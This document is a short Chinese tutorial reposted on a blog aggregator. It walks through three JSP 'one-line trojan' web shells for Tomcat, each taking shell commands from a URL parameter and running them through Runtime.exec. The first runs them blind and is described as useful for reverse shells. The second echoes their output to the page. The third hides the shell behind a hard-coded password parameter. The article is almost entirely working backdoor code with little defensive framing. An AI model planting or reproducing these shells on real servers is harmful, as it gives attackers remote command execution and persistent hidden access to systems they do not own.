jsp回显一句话木马
提示:以下是本篇文章正文内容,下面案例可供参考
一、搭建web服务
1、创建空白maven项目,搭建本地tomcat
2、引入servlet的pom依赖
二、无回显一句话
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
三、带回显一句话
代码如下(示例):
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
%>
文章来源:https://www.toymoban.com/news/detail-507189.html
三、有密码带回显一句话
<%
if ("password".equals(request.getParameter("pass"))){
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
}
%>
文章来源地址https://www.toymoban.com/news/detail-507189.html
到了这里,关于java安全——jsp一句话木马的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示](https://imgs.yssmx.com/Uploads/2024/01/407900-1.jpeg)
